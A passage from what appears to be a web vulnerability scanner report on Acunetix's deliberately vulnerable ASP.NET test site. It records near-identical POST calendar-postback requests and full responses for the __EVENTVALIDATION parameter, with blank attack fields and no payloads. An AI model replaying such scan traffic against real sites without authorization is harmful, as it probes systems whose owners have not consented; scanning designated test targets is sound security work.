and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8552&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAmiQzYtsIZGRkxLM5IYScFYGHqwtDSa17lcheCXs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLMvr%2FpAgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMnHf2lwi5lck6ExoHfMMxP9qAoI4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:07 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAmiQzYtsIZGRkxLM5IYScFYGHqwtDSa17lcheCXs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLMvr/pAgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMnHf2lwi5lck6ExoHfMMxP9qAoI4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:White" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8232&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAaiC%2BZtoIZGRktJz5jAG9BS51WBumLYSbeITRWMA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLn3q%2FrBQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9EW%2B9pHcR%2BCJdDBkRhoF0%2FjiVNGQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:30 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAaiC+ZtoIZGRktJz5jAG9BS51WBumLYSbeITRWMA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLn3q/rBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9EW+9pHcR+CJdDBkRhoF0/jiVNGQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:White" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and 